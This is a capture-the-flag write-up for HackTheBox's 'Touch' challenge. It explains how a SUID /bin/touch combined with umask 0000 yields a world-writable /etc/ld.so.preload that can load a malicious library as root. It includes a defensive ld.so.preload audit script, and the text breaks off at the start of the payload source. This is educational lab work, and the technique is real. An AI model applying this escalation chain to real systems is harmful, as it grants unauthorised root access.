misc · free · medium

Touch

HackTheBox

The target server on port 30678 runs `socat`, which provides a bash shell as user `ctf` (uid=1000). The flag is located at `/root/flag.txt`, accessible only by root. Privilege escalation is required.

$ ls tags/ techniques/
suid_exploitation shared_library_injection ld_preload_hijacking umask_manipulation

Description

"Push me, and then just touch me, till I can get my, Satisfaction!"

Analysis

Reconnaissance

Upon connecting to the server, we get a shell as user ctf:

```
nc 154.57.164.73 30678
id
# uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
```

The flag is not directly accessible:

```
cat /root/flag.txt
# cat: /root/flag.txt: Permission denied
ls -la /root/
# ls: cannot open directory '/root/': Permission denied
```

Finding SUID Binaries

```
find / -perm -4000 -type f 2>/dev/null
```

Key finding — /bin/touch has SUID+SGID bits set:

```
-rwsr-sr-x 1 root root ... /bin/touch
```

This means touch executes with root privileges, and any file created via touch will be owned by root:root.

Attack Vector: ld.so.preload

The /etc/ld.so.preload file lists shared libraries that the dynamic linker loads before all others into every dynamically linked ELF binary it starts, SUID binaries included. If we can:

  1. Create the file /etc/ld.so.preload (via SUID touch — the file will be owned by root)
  2. Write the path to our library into it (the file must be world-writable)
  3. Run any SUID binary — our library will execute with root privileges

Critical point: touch creates files with permissions determined by umask. By default umask=0022, which gives 0644 (not writable by others). But if we set umask 0000, the file will be created with 0666 permissions — world-writable!
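The chain above depends on `/etc/ld.so.preload` (or a library it names) being writable by a non-root user, which a defender can check for directly. The following is an added example, not part of the original writeup: a shell audit of that file and its entries. The function names and the `ROOT` prefix argument are assumptions, chosen so the check can run against a mounted image or a test tree.

```shell
#!/bin/sh
# Added defensive example, not from the original writeup.
# audit_preload ROOT inspects ROOT/etc/ld.so.preload and the libraries it names.
# ROOT is a hypothetical prefix: "" for the live system, or a mounted image /
# test tree. Prints one line per entry or problem; returns 1 on any FINDING.

# True when the path (symlinks followed) is writable by group or others.
loosely_writable() {
    [ -n "$(find -L "$1" -maxdepth 0 \( -perm -0002 -o -perm -0020 \) 2>/dev/null)" ]
}

audit_preload() {
    root=$1
    file="$root/etc/ld.so.preload"
    status=0

    # No file means nothing is force-loaded.
    [ -e "$file" ] || return 0

    if loosely_writable "$file"; then
        echo "FINDING: $file is writable by group/others"
        status=1
    fi

    # glibc separates entries by whitespace or ':' and treats '#' as a comment.
    set -f   # do not glob-expand entries read from the file
    for lib in $(sed 's/#.*//' "$file" | tr ':' ' '); do
        path="$root$lib"
        if [ ! -e "$path" ]; then
            echo "FINDING: preload entry $lib does not exist"
            status=1
        elif loosely_writable "$path" || loosely_writable "$(dirname "$path")"; then
            echo "FINDING: preload entry $lib is writable, or in a directory writable, by group/others"
            status=1
        else
            echo "REVIEW: preload entry $lib"
        fi
    done
    set +f
    return $status
}
```

Call `audit_preload ""` to check the running system; entries reported as `REVIEW` have safe permissions but still deserve a look, since every dynamically linked process will load them.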

Solution

Step 1: Preparing the Malicious Library

Create evil.c with a constructor function that executes when the library is loaded:

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
...
```
